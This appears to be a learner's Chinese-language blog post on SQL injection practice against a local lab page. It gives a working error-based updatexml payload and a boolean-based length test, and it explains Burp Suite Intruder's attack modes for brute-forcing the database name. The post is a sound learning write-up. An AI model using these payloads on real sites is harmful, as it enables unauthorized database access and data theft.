1. 程式人生 > 其它 >sql注入之報錯注入and boolean注入

sql注入之報錯注入and boolean注入

1.sql注入之報錯注入

正常傳參,返回頁面正常;

加入' 返回頁面報錯,出現"zhangsan"'

報錯注入使用的函式

在這裡我們使用

select updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='test' limit 0,1)),0);

直接爆出person表

在瀏覽器中使用:http://127.0.0.1/disizhang/4.1.8/error.php?username=zhangsan' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='test' limit 0,1)),0);%23

2.boolean注入攻擊

正常返回頁面

判斷注入點

判斷資料庫長度

http://127.0.0.1/disizhang/4.1.7/boolean.php?id=1 and length(database())>=1

不會使用Burp Intruder的可以看這

一、簡介

Burp Intruder是一個強大的工具,用於自動對Web應用程式自定義的攻擊,Burp Intruder 是高度可配置的,並被用來在廣範圍內進行自動化攻擊。你可以使用 Burp Intruder 方便地執行許多工,包括列舉識別符號,獲取有用資料,漏洞模糊測試。合適的攻擊型別取決於應用程式的情況,可能包括:缺陷測試:SQL 注入,跨站點指令碼,緩衝區溢位,路徑遍歷;暴力攻擊認證系統;列舉;操縱引數;拖出隱藏的內容和功能;會話令牌測序和會話劫持;資料探勘;併發攻擊;應用層的拒絕服務式攻擊。

二、模組說明

Burp Intruder主要有四個模組組成:

1:Target 用於配置目標伺服器進行攻擊的詳細資訊。
2:Positions 設定Payloads的插入點以及攻擊型別(攻擊模式)。
3:Payloads 設定payload,配置字典
4:Opetions 此選項卡包含了request headers,request engine,attack results ,grep match,grep_extrack,grep payloads和redirections。你可以發動攻擊之前,在主要Intruder的UI上編輯這些選項,大部分設定也可以在攻擊時對已在執行的視窗進行修改。

1:Target目標選項(Target tab)

這個選項是用來配置目標伺服器的細節:

2:Positions位置選項(Positions tab)

這個選項是用來配置在攻擊裡產生的所有 HTTP 請求的模板:

使用一對§字元來標記出有效負荷的位置,在這兩個符號直接包含了模板文字的內容。當把一個有效負荷放置到一個給出的請求的特殊位置上時,就把這§符號放到這個位置,然後在兩個符號之間的出現的文字都會被有效負荷替換。當有個特殊位置沒有為一個給出的請求安排有效負荷時(這隻適用”sniper”攻擊型別),那個位置的§字元會被刪除,出現在它們之間的文字不會變化。

當使用 Burp Suite 傳送一個其他地方的請求時,Burp Intruder 會對你最想放置有效負荷的位置做一個最好的猜測,並且它把這些放置在每個 URL 和主體引數的值裡,以及每個cookie 裡。每個標記和它中間的文字都會被加亮以顯得更清晰。你可以使用 Intruder 選單上的選項標記的位置是要替換還是附加現有的引數值。在上面的請求編輯器裡,指出了定義位置的數量和文字模板的大小。

你可以使用選項上的按鈕來控制位置上的標記:

1. add § — 在當前游標位置插入一個位置標記。
2. clear § — 刪除整個模板或選中的部分模板裡的位置標記。
3. auto § — 這會對放置標記的位置做一個猜測,放哪裡會有用,然後就把標記放到相應位置。這是一個為攻擊常規漏洞(SQL 注入)快速標記出合適位置的有用的功能,然後人工標記是為自定義攻擊的。
4.refresh — 如果需要,可以重新整理編輯器裡有顏色的程式碼。
5.clear — 刪除整個編輯器內容。

3:Payloads有效負荷選項(Payloads tab)

這個選項是用來配置一個或多個有效負荷的集合。如果定義了”cluster bomb”和”pitchfork”攻擊型別,然後必須為每定義的有效負荷位置(最多8個)配置一個單獨的有效負荷。使用”payload set”下拉選單選擇要配置的有效負荷。

選項1:Payload Sets Payload數量型別設定

選項2:Payload Opetions[Simple list] 該選項會根據選項1中Payload type的設定而改變

選項3:Payload Processing 對生成的Payload進行編碼、加密、擷取等操作

選項4:Payload Encoding 你可以配置哪些有效載荷中的字元應該是URL編碼的HTTP請求中的安全傳輸。任何已配置的URL編碼最後應用,任何有效載荷處理規則執行之後。 這是推薦使用此設定進行最終URL編碼,而不是一個有效載荷處理規則,因為可以用來有效載荷的grep選項來檢查響應為呼應有效載荷的最終URL編碼應用之前。

4:Opetions 選項卡(Options tab) 此選項卡包含了request headers,request engine,attack results ,grep match,grep_extrack,grep payloads和redirections。你可以發動攻擊之前,在主要Intruder的UI上編輯這些選項,大部分設定也可以在攻擊時對已在執行的視窗進行修改。

選項1:Request Headers這些設定控制在Intruder是否更新配置請求頭。

如果選中‘update Content-Length header’框,Burp Intruder 會使用每個請求的 HTTP 主體長度的正確值,新增或更新這個請求裡 HTTP 訊息頭的內容長度。這個功能對一些需要把可變長度的有效載荷插入到 HTTP 請求模板主體的攻擊是很有必要的。這個 HTTP 規範和大多數 web 伺服器一樣,需要使用訊息頭內容長度來指定 HTTP 主體長度的正確值。如果沒有指定正確值,目標伺服器會返回一個錯誤,也可能返回一個未完成的請求,也可能無限期地等待接收請求裡的進一步資料。

如果選中‘set Connection: close’框,則 Burp Intruder 會新增或更新 HTTP 訊息頭的連線來請求在每個請求後已關閉的連線。在多數情況下,這個選項會讓攻擊執行得更快。

選項2:Request Engine設定傳送請求的執行緒、超時重試等。

選項3:Attack Results 設定攻擊結果的顯示。

選項4:Grep – Match 在響應中找出存在指定的內容的一項。

選項5:Grep – Extract 通過正則提取返回資訊中的內容。

選項6:Grep – Payloads 這些設定可以用於包含已提交的有效負載的反射的標誌結果專案。如果啟用了此選項,BurpSuite會新增包含一個複選框指示當前負載的值在每個響應發現新的結果列。

選項7:Redirections 重定向響應,控制Burp在進行攻擊時如何處理重定向。

Burp Suite Intruder的4種攻擊型別

一 Sniper(狙擊手模式)

狙擊手模式使用一組payload集合,它一次只使用一個payload位置,假設你標記了兩個位置“A”和“B”,payload值為“1”和“2”,那麼它攻擊會形成以下組合(除原始資料外):

attack NO.location Alocation B
1 1 no replace
2 2 no replace
3 no replace 1
4 no replace 2

二Battering ram(攻城錘模式)

攻城錘模式與狙擊手模式類似的地方是,同樣只使用一個payload集合,不同的地方在於每次攻擊都是替換所有payload標記位置,而狙擊手模式每次只能替換一個payload標記位置。

attack NO.location Alocation B
1 1 1
2 2 2

三Pitchfork(草叉模式)

草叉模式允許使用多組payload組合,在每個標記位置上遍歷所有payload組合,假設有兩個位置“A”和“B”,payload組合1的值為“1”和“2”,payload組合2的值為“3”和“4”,則攻擊模式如下:

attack NO.location Alocation B
1 1 3
2 2 4

四Cluster bomb(集束炸彈模式)

集束炸彈模式跟草叉模式不同的地方在於,集束炸彈模式會對payload組進行笛卡爾積,還是上面的例子,如果用集束炸彈模式進行攻擊,則除baseline請求外,會有四次請求:

attack NO.location Alocation B
1 1 3
2 1 4
3 2 3
4 2 4

拓展閱讀:

Burp Suite詳細使用教程-Intruder模組詳解(1)

http://www.freebuf.com/tools/2079.html

Burp Suite詳細使用教程-Intruder模組詳解(2)

http://www.freebuf.com/articles/3693.html

Burp Suite詳細使用教程-Intruder模組詳解(3)

http://www.freebuf.com/articles/4184.html

可以結合burp來爆破資料庫的庫名

設定兩個paylod

使用集束炸彈進行爆破

成功爆破出資料庫名test

資料庫裡的test資料庫

大佬勿噴,小白正在努力學習中。。。。。。。。。。